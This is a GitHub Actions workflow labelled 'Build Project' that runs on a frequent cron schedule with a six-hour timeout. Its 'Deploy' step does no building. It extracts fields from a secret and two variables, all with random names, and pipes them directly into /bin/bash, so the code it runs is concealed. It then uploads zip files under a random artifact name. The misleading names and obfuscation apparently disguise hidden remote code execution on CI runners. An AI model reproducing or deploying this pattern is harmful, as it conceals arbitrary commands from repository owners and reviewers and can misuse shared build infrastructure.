name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '29 5,11,17,23 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Deploy
        env:
          w2485: ${{ secrets.w2485 }}
        run: |
          printf '%s' "$w2485" | jq -r .xp2047 | /bin/bash
          echo $madyl77408 | jq -r .fo17 | /bin/bash
          echo $iqb558 | jq -r .pc07201 | /bin/bash

      - name: Save results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: zYcqO3ql
          path: "*.zip"
          retention-days: 1
